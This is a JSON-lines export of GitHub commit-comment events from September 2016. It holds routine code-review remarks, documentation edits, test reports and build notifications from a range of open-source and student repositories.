{"id":"4574806123","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056107,"position":60,"line":60,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:44:48Z","updated_at":"2016-09-16T15:44:48Z","body":"fieldset + legend"}},"created_at":"2016-09-16T15:44:48Z"}
{"id":"4574810349","type":"CommitCommentEvent","actor":{"login":"lspigariol"},"repo":{"name":"wollok/colecciones-Willy-Wonka"},"payload":{"comment":{"id":19056112,"position":4,"line":6,"path":"README.md","commit_id":"840f739bd17e1c5d056ad39e7325910d7bc1741d","created_at":"2016-09-16T15:45:34Z","updated_at":"2016-09-16T15:45:34Z","body":"hola"}},"created_at":"2016-09-16T15:45:34Z"}
{"id":"4574811707","type":"CommitCommentEvent","actor":{"login":"Ichimonji10"},"repo":{"name":"Ichimonji10/pulp-smash"},"payload":{"comment":{"id":19056113,"position":null,"line":null,"path":null,"commit_id":"bf31d75c5235c630cce04b62fc2b0d72b835bc41","created_at":"2016-09-16T15:45:47Z","updated_at":"2016-09-16T15:45:47Z","body":"I cloned Pulp Fixtures onto the system under test, generated DRPMs, and served them up with `python -m http.server`. I then edited `pulp_smash.constants` onto the system running Pulp Smash and applied the following diff:\r\n\r\n```diff\r\ndiff --git a/pulp_smash/constants.py b/pulp_smash/constants.py\r\nindex 0cdb850..3a73a94 100644\r\n--- a/pulp_smash/constants.py\r\n+++ b/pulp_smash/constants.py\r\n@@ -82,7 +82,7 @@ This path may be joined with :data:`DRPM_FEED_URL` or\r\n DRPM_FEED_COUNT = 4\r\n \"\"\"The number of packages available at :data:`DRPM_FEED_URL`.\"\"\"\r\n \r\n-DRPM_FEED_URL = urljoin(PULP_FIXTURES_BASE_URL, 'drpm/')\r\n+DRPM_FEED_URL = 'http://[snip!]:8000/fixtures/drpm/'\r\n \"\"\"The URL to a DRPM repository.\"\"\"\r\n \r\n DRPM_URL = urljoin(DRPM_FEED_URL, DRPM)\r\n```\r\n\r\nThe tests pass:\r\n\r\n```console\r\n$ python -m unittest2 pulp_smash.tests.rpm.api_v2.test_signatures_{checked_for_copies,checked_for_uploads,saved_for_packages}\r\n............................s..s..\r\n----------------------------------------------------------------------\r\nRan 34 tests in 335.567s\r\n\r\nOK (skipped=2)\r\n```"}},"created_at":"2016-09-16T15:45:47Z"}
{"id":"4574813960","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056119,"position":69,"line":69,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:46:12Z","updated_at":"2016-09-16T15:46:12Z","body":"br убрать"}},"created_at":"2016-09-16T15:46:12Z"}
{"id":"4574815526","type":"CommitCommentEvent","actor":{"login":"jjl"},"repo":{"name":"enragedginger/mpg"},"payload":{"comment":{"id":19056122,"position":null,"line":null,"path":null,"commit_id":"61375966f3f58ad693375ad3026d701cad2ebec0","created_at":"2016-09-16T15:46:28Z","updated_at":"2016-09-16T15:46:28Z","body":"Mind if I ask what you're trying to solve with this? If you're running into an issue, we'd love to deal with it upstream :)"}},"created_at":"2016-09-16T15:46:28Z"}
{"id":"4574820442","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056136,"position":53,"line":53,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:47:21Z","updated_at":"2016-09-16T15:47:21Z","body":"все br убрать"}},"created_at":"2016-09-16T15:47:21Z"}
{"id":"4574828713","type":"CommitCommentEvent","actor":{"login":"wence-"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19056153,"position":10,"line":10,"path":"docs/source/parameters.rst","commit_id":"5e3a6c1883bf4ed25762cd8282cf42839ff45f8b","created_at":"2016-09-16T15:48:52Z","updated_at":"2016-09-16T15:48:52Z","body":"Grammar: \"can\", not \"could\".\r\n\r\nBut maybe something like.\r\n\r\n```\r\nThe parameters instance is a nested dictionary of configuration parameters, to which one\r\ncan attach metadata for both validation and presentation of additional information in the GUI.\r\n\r\nWe create a :class:`~.Parameters` instance by providing a name for the parameters and an optional summary.  Any further arguments are treated as for the :class:`~.dict` constructor.  Although this object behaves like a\r\nnormal python dictionary, its keys instead contain metadata relevant for validation and presentation.  This is\r\nachieved through the :class:`~.TypedKey` class.\r\n```"}},"created_at":"2016-09-16T15:48:52Z"}
{"id":"4574830006","type":"CommitCommentEvent","actor":{"login":"cgalloni"},"repo":{"name":"UZHCMS/EXOVVNtuplizerRunII"},"payload":{"comment":{"id":19056155,"position":null,"line":null,"path":null,"commit_id":"23890b0704b4c3aab3b112e4df89ad55ea869def","created_at":"2016-09-16T15:49:08Z","updated_at":"2016-09-16T15:49:08Z","body":"Still I think that like this offline you have to loop over the gen particle to discover how many tau you have  that are prompt and then loop on the visible tau, since it is not known a priori where it came from. Am I wrong?\r\n"}},"created_at":"2016-09-16T15:49:08Z"}
{"id":"4574835115","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056169,"position":74,"line":74,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:50:05Z","updated_at":"2016-09-16T15:50:05Z","body":"всем input снизу добавить label, нам же нужно будет стилизовать радиокнопки, а input так сделать не выйдет"}},"created_at":"2016-09-16T15:50:05Z"}
{"id":"4574836881","type":"CommitCommentEvent","actor":{"login":"wence-"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19056176,"position":24,"line":24,"path":"docs/source/parameters.rst","commit_id":"5e3a6c1883bf4ed25762cd8282cf42839ff45f8b","created_at":"2016-09-16T15:50:24Z","updated_at":"2016-09-16T15:50:24Z","body":"Does one have to do this.  Can one instead not do:\r\n\r\n```\r\nparameters = Parameters(...)\r\n\r\nparameters[TypedKey(\"foo\", ...)] = \"bar\"\r\n```\r\n?\r\n\r\nI think this should be the way we recommend doing things (being able to fill in the metadata after the fact is good for firedrake itself because it can annotate upstream packages, but downstream packages have access to `TypedKey` directly)."}},"created_at":"2016-09-16T15:50:24Z"}
{"id":"4574840154","type":"CommitCommentEvent","actor":{"login":"wence-"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19056180,"position":33,"line":33,"path":"docs/source/parameters.rst","commit_id":"5e3a6c1883bf4ed25762cd8282cf42839ff45f8b","created_at":"2016-09-16T15:51:00Z","updated_at":"2016-09-16T15:51:00Z","body":"You can link to the source with `:meth:~.KeyType.parse` and similarly for `validate`."}},"created_at":"2016-09-16T15:51:00Z"}
{"id":"4574842294","type":"CommitCommentEvent","actor":{"login":"wence-"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19056185,"position":38,"line":38,"path":"docs/source/parameters.rst","commit_id":"5e3a6c1883bf4ed25762cd8282cf42839ff45f8b","created_at":"2016-09-16T15:51:24Z","updated_at":"2016-09-16T15:51:24Z","body":"s/could/can/ s/form/from/ I suspect."}},"created_at":"2016-09-16T15:51:24Z"}
{"id":"4574842561","type":"CommitCommentEvent","actor":{"login":"crandmck"},"repo":{"name":"strongloop/loopback.io"},"payload":{"comment":{"id":19056186,"position":null,"line":null,"path":null,"commit_id":"68694f6c5300351fe0cd381d9be40b4bb1a4da5b","created_at":"2016-09-16T15:51:28Z","updated_at":"2016-09-16T15:51:28Z","body":"Doh!  Sorry @doublemarked \r\nb24bdb343f025ab40ee67ea229b6e5085dc9fd82 should fix it.  \r\nNot sure how this happened, since I tested everything locally before I committed--thanks for reporting!"}},"created_at":"2016-09-16T15:51:28Z"}
{"id":"4574842889","type":"CommitCommentEvent","actor":{"login":"apapadop"},"repo":{"name":"WhisperSystems/Signal-Android"},"payload":{"comment":{"id":19056188,"position":null,"line":null,"path":null,"commit_id":"8f576938d96733d44322029953e0c23551be5b5b","created_at":"2016-09-16T15:51:30Z","updated_at":"2016-09-16T15:51:30Z","body":"Typo in tag of jni/redphone/RtpAudioReceiver.cpp:\r\n\"recveived malformed packet!\" should be\r\n\"received malformed packet!\""}},"created_at":"2016-09-16T15:51:30Z"}
{"id":"4574844533","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056193,"position":79,"line":79,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:51:48Z","updated_at":"2016-09-16T15:51:48Z","body":"изменить значение атрибута name/ Для радио кнопок name должен быть у каждой разный, так как активной может быть только одна кнопка. Также всем input задать еще идентификаторы, для привязки label через for"}},"created_at":"2016-09-16T15:51:48Z"}
{"id":"4574847920","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":19056201,"position":null,"line":null,"path":null,"commit_id":"aae2b999f9bd4ff11234eb5fc1de304b2e9c159b","created_at":"2016-09-16T15:52:25Z","updated_at":"2016-09-16T15:52:25Z","body":"One last (hopefully) thing I noticed when reading this is that it's not clear that some sections are specific to micro:bit, and some to ESP8266. It's only in the section headings, which I tend to skim/skip :)\r\nI think all the device-specific sections (Mu, uFlash, Esptool) should mention the device they're for in their ~first sentence."}},"created_at":"2016-09-16T15:52:25Z"}
{"id":"4574847984","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-amchappell9"},"payload":{"comment":{"id":19056202,"position":null,"line":null,"path":null,"commit_id":"099a4ac4d5fd7e84fcccd371124a789f84770e87","created_at":"2016-09-16T15:52:26Z","updated_at":"2016-09-16T15:52:26Z","body":"Hi Austin, \r\n\r\nYou did a good job on the design of methods in the SantaInAnElevator class - methods are nicely split into single-purpose methods.\r\n\r\nTesting of the SantaInAnElevator class could use some improvements:\r\n- [ ] name test methods descriptively so that it is easy to determine what you are testing.\r\n- [ ] remember to use Assertions to verify determineFloor produces the correct results.\r\n- [ ] what was your code coverage %? How could you improve that coverage to 100% of lines in Santa?"}},"created_at":"2016-09-16T15:52:26Z"}
{"id":"4574851938","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"InspectorElement/homework-o-o-p"},"payload":{"comment":{"id":19056211,"position":31,"line":82,"path":"homework-1.html","commit_id":"32f1ac7871796d1ca8565242c616434fe3ad7dc1","created_at":"2016-09-16T15:53:11Z","updated_at":"2016-09-16T15:53:11Z","body":"Can't put `for` loops inside a class. You can only have functions inside classes."}},"created_at":"2016-09-16T15:53:11Z"}
{"id":"4574857087","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"InspectorElement/homework-o-o-p"},"payload":{"comment":{"id":19056217,"position":38,"line":89,"path":"homework-1.html","commit_id":"32f1ac7871796d1ca8565242c616434fe3ad7dc1","created_at":"2016-09-16T15:54:08Z","updated_at":"2016-09-16T15:54:08Z","body":"To declare a new Food Item, you need a Food class first. `new` is a reserved word. So it would be\r\n\r\n```js\r\nconst pizza = new Food();\r\n```\r\n\r\nNote the space."}},"created_at":"2016-09-16T15:54:08Z"}
{"id":"4574857451","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056218,"position":85,"line":85,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:54:12Z","updated_at":"2016-09-16T15:54:12Z","body":"добавить идентификатор и label после input Связать через for/ Для всех ниже лежащих чекбоксов тоже"}},"created_at":"2016-09-16T15:54:12Z"}
{"id":"4574858786","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056219,"position":98,"line":98,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:54:25Z","updated_at":"2016-09-16T15:54:25Z","body":"убрать br"}},"created_at":"2016-09-16T15:54:25Z"}
{"id":"4574865344","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056229,"position":99,"line":99,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:55:39Z","updated_at":"2016-09-16T15:55:39Z","body":"именно здесь label не нужен. Можно также сделать кнопкой с типом submit"}},"created_at":"2016-09-16T15:55:39Z"}
{"id":"4574866535","type":"CommitCommentEvent","actor":{"login":"scottlowe"},"repo":{"name":"Swirrl/dclg-iu-dashboard"},"payload":{"comment":{"id":19056230,"position":null,"line":null,"path":null,"commit_id":"73796d4da67f73e33b444311d371da6983ad5513","created_at":"2016-09-16T15:55:51Z","updated_at":"2016-09-16T15:55:51Z","body":"Results in something like `(?i)VALUES\\s+\\?foo\\s+\\?bar(\\s+\\{(.*?)\\})*`"}},"created_at":"2016-09-16T15:55:51Z"}
{"id":"4574869252","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056240,"position":103,"line":103,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:56:22Z","updated_at":"2016-09-16T15:56:22Z","body":"page-footer лучше"}},"created_at":"2016-09-16T15:56:22Z"}
{"id":"4574869345","type":"CommitCommentEvent","actor":{"login":"doublemarked"},"repo":{"name":"strongloop/loopback.io"},"payload":{"comment":{"id":19056241,"position":null,"line":null,"path":null,"commit_id":"68694f6c5300351fe0cd381d9be40b4bb1a4da5b","created_at":"2016-09-16T15:56:22Z","updated_at":"2016-09-16T15:56:22Z","body":"Now breaking on\n\npages/en/lb2/Remote-hooks.md :/\n\nOn Fri, Sep 16, 2016 at 6:51 PM Rand McKinney <notifications@github.com>\nwrote:\n\n> Doh! Sorry @doublemarked <https://github.com/doublemarked>\n> b24bdb3\n> <https://github.com/strongloop/loopback.io/commit/b24bdb343f025ab40ee67ea229b6e5085dc9fd82>\n> should fix it.\n>\n> Not sure how this happened, since I tested everything locally before I\n> committed--thanks for reporting!\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/strongloop/loopback.io/commit/68694f6c5300351fe0cd381d9be40b4bb1a4da5b#commitcomment-19056186>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAOmViWw1GUg9svzIzxiO4LG_GXatKsnks5qqrsBgaJpZM4J-xGB>\n> .\n>\n"}},"created_at":"2016-09-16T15:56:22Z"}
{"id":"4574873008","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056245,"position":105,"line":105,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:57:02Z","updated_at":"2016-09-16T15:57:02Z","body":"cow кнопки лучше сделать отдельным блоком"}},"created_at":"2016-09-16T15:57:02Z"}
{"id":"4574874891","type":"CommitCommentEvent","actor":{"login":"alexax66"},"repo":{"name":"alexax66/kernel_samsung_a3xelte"},"payload":{"comment":{"id":19056249,"position":null,"line":null,"path":null,"commit_id":"2edd8e9e7f0958e959e104b0ebdf5468c905ce30","created_at":"2016-09-16T15:57:23Z","updated_at":"2016-09-16T15:57:23Z","body":"I test it now, and phone has good  response with this  governor "}},"created_at":"2016-09-16T15:57:23Z"}
{"id":"4574875564","type":"CommitCommentEvent","actor":{"login":"madmath"},"repo":{"name":"erozqba/sous-chef"},"payload":{"comment":{"id":19056250,"position":null,"line":null,"path":null,"commit_id":"4028062384dbe44dad55a0d253ab22aa703ecfbe","created_at":"2016-09-16T15:57:31Z","updated_at":"2016-09-16T15:57:31Z","body":"Let's make sure the prod version doesnt have both volumes. It shouldnt but please verify"}},"created_at":"2016-09-16T15:57:31Z"}
{"id":"4574875753","type":"CommitCommentEvent","actor":{"login":"phausler"},"repo":{"name":"apple/swift-corelibs-foundation"},"payload":{"comment":{"id":19056251,"position":5,"line":787,"path":"CoreFoundation/Base.subproj/CFUtilities.c","commit_id":"bc4cabbddc8cd725b159b47c6eb6d6973237e31d","created_at":"2016-09-16T15:57:32Z","updated_at":"2016-09-16T15:57:32Z","body":"Android's malloc will prefer to return chunks that have already been used since it is a compacting malloc. Whereas other operating systems like Darwin will prefer to return un-used chunks which more often don't need null termination. My guess is that you need to null terminate your buffer always ;)\r\n\r\nAlso consider writing the buffer as*:\r\n\r\n```c\r\n\r\nchar stack_buffer[1024] = { 0 };\r\nchar *buffer = &stack_buffer[0];\r\nCFStringEncoding encoding = kCFStringEncodingUTF8;\r\nCFIndex maxLength = CFStringGetMaximumSizeForEncoding(CFStringGetLength(message), encoding);\r\nif (maxLength > sizeof(stack_buffer) / sizeof(stack_buffer[0])) {\r\n\tbuffer = calloc(sizeof(char), maxLength);\r\n}\r\nconst char *ptr = CFStringGetCStringPtr(str, encoding);\r\nif (ptr == NULL) {\r\n\tif (CFStringGetCString(str, buffer, buffer, encoding)) {\r\n\t\tptr = buffer;\r\n\t}\r\n}\r\n\r\n__android_log_print(priority, _CFProcessName(), \"%s\", buffer);\r\n\r\nif (buffer != &stack_buffer[0]) free(buffer);\r\n```\r\n\r\n* This was written in a browser and not an IDE so ymmv"}},"created_at":"2016-09-16T15:57:32Z"}
{"id":"4574876322","type":"CommitCommentEvent","actor":{"login":"hoch"},"repo":{"name":"hoch/web-audio-api"},"payload":{"comment":{"id":19056252,"position":57,"line":4553,"path":"index.html","commit_id":"f824c20a9d1a659c1c42cacf6bd232c1c2ac93df","created_at":"2016-09-16T15:57:39Z","updated_at":"2016-09-16T15:57:39Z","body":"Done."}},"created_at":"2016-09-16T15:57:39Z"}
{"id":"4574876750","type":"CommitCommentEvent","actor":{"login":"hoch"},"repo":{"name":"hoch/web-audio-api"},"payload":{"comment":{"id":19056253,"position":68,"line":4561,"path":"index.html","commit_id":"f824c20a9d1a659c1c42cacf6bd232c1c2ac93df","created_at":"2016-09-16T15:57:44Z","updated_at":"2016-09-16T15:57:44Z","body":"Done."}},"created_at":"2016-09-16T15:57:44Z"}
{"id":"4574877181","type":"CommitCommentEvent","actor":{"login":"GustoOo"},"repo":{"name":"GustoOo/Guto-Salaz"},"payload":{"comment":{"id":19056254,"position":null,"line":null,"path":null,"commit_id":"16576b7befdc22bd640bbc7d7f4ea838dd0eddaf","created_at":"2016-09-16T15:57:49Z","updated_at":"2016-09-16T15:57:49Z","body":"or grafic plans"}},"created_at":"2016-09-16T15:57:49Z"}
{"id":"4574877476","type":"CommitCommentEvent","actor":{"login":"hoch"},"repo":{"name":"hoch/web-audio-api"},"payload":{"comment":{"id":19056255,"position":236,"line":5056,"path":"index.html","commit_id":"f824c20a9d1a659c1c42cacf6bd232c1c2ac93df","created_at":"2016-09-16T15:57:52Z","updated_at":"2016-09-16T15:57:52Z","body":"Done."}},"created_at":"2016-09-16T15:57:52Z"}
{"id":"4574879011","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19056260,"position":null,"line":null,"path":null,"commit_id":"bb113f0b87f92d5c4ef9a3d8436e5a459cbca7a9","created_at":"2016-09-16T15:58:09Z","updated_at":"2016-09-16T15:58:09Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1031](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13453&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T15:58:09Z"}
{"id":"4574879178","type":"CommitCommentEvent","actor":{"login":"hoch"},"repo":{"name":"hoch/web-audio-api"},"payload":{"comment":{"id":19056261,"position":262,"line":5071,"path":"index.html","commit_id":"f824c20a9d1a659c1c42cacf6bd232c1c2ac93df","created_at":"2016-09-16T15:58:11Z","updated_at":"2016-09-16T15:58:11Z","body":"I've added a sentence with a link. Done."}},"created_at":"2016-09-16T15:58:11Z"}
{"id":"4574879491","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19056262,"position":null,"line":null,"path":null,"commit_id":"28d7c75c5dadd380e6866a9b78bf76c7f546a52b","created_at":"2016-09-16T15:58:14Z","updated_at":"2016-09-16T15:58:14Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1032](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13454&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T15:58:14Z"}
{"id":"4574879562","type":"CommitCommentEvent","actor":{"login":"hoch"},"repo":{"name":"hoch/web-audio-api"},"payload":{"comment":{"id":19056263,"position":261,"line":5070,"path":"index.html","commit_id":"f824c20a9d1a659c1c42cacf6bd232c1c2ac93df","created_at":"2016-09-16T15:58:14Z","updated_at":"2016-09-16T15:58:14Z","body":"Done."}},"created_at":"2016-09-16T15:58:14Z"}
{"id":"4574898477","type":"CommitCommentEvent","actor":{"login":"jojo12"},"repo":{"name":"jemproject/JEM-Project"},"payload":{"comment":{"id":19056309,"position":null,"line":null,"path":null,"commit_id":"e8813722207da34bdaa3cfd2925d4376f34c568d","created_at":"2016-09-16T16:01:32Z","updated_at":"2016-09-16T16:01:32Z","body":"I mean, after all customfields and metafield should be in the second tab.\r\nIf someone knows what's possible with that, then he can better the informations.\r\nso I understand enhanced. Your suggestions. Other is really bad.\r\n\"Advanced\" could be good too."}},"created_at":"2016-09-16T16:01:32Z"}
{"id":"4574901432","type":"CommitCommentEvent","actor":{"login":"shivashankar2083"},"repo":{"name":"spring-cloud-samples/config-repo"},"payload":{"comment":{"id":19056314,"position":null,"line":null,"path":null,"commit_id":"fa2f2dec260860d1a647296182bc23f7986210ad","created_at":"2016-09-16T16:02:07Z","updated_at":"2016-09-16T16:02:07Z","body":"Is there any test cases that that i can refer to read key value pairs from xml file. I did not find any Junits around it?."}},"created_at":"2016-09-16T16:02:07Z"}
{"id":"4574901773","type":"CommitCommentEvent","actor":{"login":"frederic-mahe"},"repo":{"name":"torognes/vsearch"},"payload":{"comment":{"id":19056315,"position":217,"line":2671,"path":"man/vsearch.1","commit_id":"36669b797096b4ad27865f6ff3dd54e8e1918417","created_at":"2016-09-16T16:02:11Z","updated_at":"2016-09-16T16:02:11Z","body":"v2.1.0, not 2.0.6"}},"created_at":"2016-09-16T16:02:11Z"}
{"id":"4574904811","type":"CommitCommentEvent","actor":{"login":"mafrosis"},"repo":{"name":"oii/ogre"},"payload":{"comment":{"id":19056319,"position":69,"line":69,"path":"ogreclient/dist/vagrant-windows/OGRE/OgreClientService/OgreWrapper.cs","commit_id":"0382191baddd5eda889c3d2c093eb3b38da5d21e","created_at":"2016-09-16T16:02:33Z","updated_at":"2016-09-16T16:02:33Z","body":"You lost me again"}},"created_at":"2016-09-16T16:02:33Z"}
{"id":"4574912529","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19056329,"position":7,"line":137,"path":"application/config/internal.php","commit_id":"fefb8fef6465dc807febd59f281a2f65d05e0e5d","created_at":"2016-09-16T16:03:59Z","updated_at":"2016-09-16T16:03:59Z","body":"Carsten was concered about security, so I removed it."}},"created_at":"2016-09-16T16:03:59Z"}
{"id":"4574913953","type":"CommitCommentEvent","actor":{"login":"alonsogarciapablo"},"repo":{"name":"CartoDB/cartodb.js"},"payload":{"comment":{"id":19056333,"position":null,"line":null,"path":null,"commit_id":"c19f736cfcdf82b9a45e2d779742886ed9b41fd9","created_at":"2016-09-16T16:04:15Z","updated_at":"2016-09-16T16:04:15Z","body":"cc: @piensaenpixel \r\n![scroll](https://cloud.githubusercontent.com/assets/390398/18592583/f4e93816-7c37-11e6-986b-b2d0ba8da2ea.gif)\r\n"}},"created_at":"2016-09-16T16:04:15Z"}
{"id":"4574914678","type":"CommitCommentEvent","actor":{"login":"goatandsheep"},"repo":{"name":"geometrybase/multer"},"payload":{"comment":{"id":19056335,"position":null,"line":null,"path":null,"commit_id":"2aa8461371705defa5533b258fac8352f256d21e","created_at":"2016-09-16T16:04:25Z","updated_at":"2016-09-16T16:04:25Z","body":"@geometrybase is this working? Can you merge this commit to the main branch?"}},"created_at":"2016-09-16T16:04:25Z"}
{"id":"4574916073","type":"CommitCommentEvent","actor":{"login":"jtbandes"},"repo":{"name":"infininight/swift.tmbundle"},"payload":{"comment":{"id":19056341,"position":5,"line":968,"path":"Syntaxes/Swift.tmLanguage","commit_id":"bfb3dda0ba734d4ab942c3a8a3422f56aed6b659","created_at":"2016-09-16T16:04:40Z","updated_at":"2016-09-16T16:04:40Z","body":"@infininight Just a thought: it might be interesting to try and highlight a *missing* function body as invalid in other contexts. Perhaps this could take the form of another pattern in function-declaration, which would match `(?<=\\))[\\s\\n]*(?!\\{)(?=\\S)` (although this wouldn't support comments, you might have to go another level of patterns deeper)."}},"created_at":"2016-09-16T16:04:40Z"}
{"id":"4574916470","type":"CommitCommentEvent","actor":{"login":"wlynch"},"repo":{"name":"amy/shetalks"},"payload":{"comment":{"id":19056342,"position":12,"line":12,"path":"shetalks.go","commit_id":"b107abba5c1ce2ae106c7235b88543b8b8600160","created_at":"2016-09-16T16:04:45Z","updated_at":"2016-09-16T16:04:45Z","body":"Consider passing in an Event to Update as the diff instead of individual params. This lets you do nice things like Read an event, mutate the struct, then pass it back to the Update.\r\n\r\nThe only downside of this is that you will need to use pointers in the struct to differentiate between \"unset this field\" vs. \"don't do anything to this field\", however the upside is that you won't have to change your implementation if you decide you want to modify Event."}},"created_at":"2016-09-16T16:04:45Z"}
{"id":"4574916841","type":"CommitCommentEvent","actor":{"login":"DanielAndreasen"},"repo":{"name":"DanielAndreasen/SWEET-Cat"},"payload":{"comment":{"id":19056344,"position":null,"line":null,"path":null,"commit_id":"be56459aecbbaaad09f564a6f8231b821794b7d3","created_at":"2016-09-16T16:04:49Z","updated_at":"2016-09-16T16:04:49Z","body":"Okay, we can work on that together/I can help you if you need it."}},"created_at":"2016-09-16T16:04:49Z"}
{"id":"4574918265","type":"CommitCommentEvent","actor":{"login":"wlynch"},"repo":{"name":"amy/shetalks"},"payload":{"comment":{"id":19056348,"position":3,"line":3,"path":"shetalks.go","commit_id":"b107abba5c1ce2ae106c7235b88543b8b8600160","created_at":"2016-09-16T16:05:06Z","updated_at":"2016-09-16T16:05:06Z","body":"You should probably add id."}},"created_at":"2016-09-16T16:05:06Z"}
{"id":"4574919080","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-sgreenholtz"},"payload":{"comment":{"id":19056352,"position":3,"line":45,"path":"src/main/java/edu/madisoncollege/entjava/SantaInAnElevator.java","commit_id":"12648e7079c7ac04f21e86408aa1f2bd77a294a7","created_at":"2016-09-16T16:05:16Z","updated_at":"2016-09-16T16:05:16Z","body":"good separation of functionality into single-purpose methods.\r\ngood job writing testable methods.\r\ngood use of try with resources and logging."}},"created_at":"2016-09-16T16:05:16Z"}
{"id":"4574921669","type":"CommitCommentEvent","actor":{"login":"Monkeyboy2805"},"repo":{"name":"iTXTech/DevTools"},"payload":{"comment":{"id":19056360,"position":null,"line":null,"path":null,"commit_id":"9fbb96eb999c5eb7101a40780889a62066d1aea9","created_at":"2016-09-16T16:05:45Z","updated_at":"2016-09-16T16:05:45Z","body":"lel"}},"created_at":"2016-09-16T16:05:45Z"}
{"id":"4574922348","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056362,"position":108,"line":108,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T16:05:53Z","updated_at":"2016-09-16T16:05:53Z","body":"еще нужно в ссылку вписать поясняющий текст, на случай если отвалится css (twitter и т.д.)"}},"created_at":"2016-09-16T16:05:53Z"}
{"id":"4574923436","type":"CommitCommentEvent","actor":{"login":"goatandsheep"},"repo":{"name":"wtonsp/multer"},"payload":{"comment":{"id":19056364,"position":null,"line":null,"path":null,"commit_id":"63f0ef5970784ab072f9c755a34746711d8098e5","created_at":"2016-09-16T16:06:08Z","updated_at":"2016-09-16T16:06:08Z","body":"@wtonsp is this working? If so, can you merge to the main branch?"}},"created_at":"2016-09-16T16:06:08Z"}
{"id":"4574926190","type":"CommitCommentEvent","actor":{"login":"SuchkovEgor"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19056368,"position":6,"line":6,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-16T16:06:39Z","updated_at":"2016-09-16T16:06:39Z","body":"Здесь следует писать enum InputType{ ...}; Тогда с использованием InputType& никаких проблем не будет."}},"created_at":"2016-09-16T16:06:39Z"}
{"id":"4574928495","type":"CommitCommentEvent","actor":{"login":"SuchkovEgor"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19056374,"position":33,"line":16,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-16T16:07:07Z","updated_at":"2016-09-16T16:07:07Z","body":"Зря убрали этот конструктор."}},"created_at":"2016-09-16T16:07:07Z"}
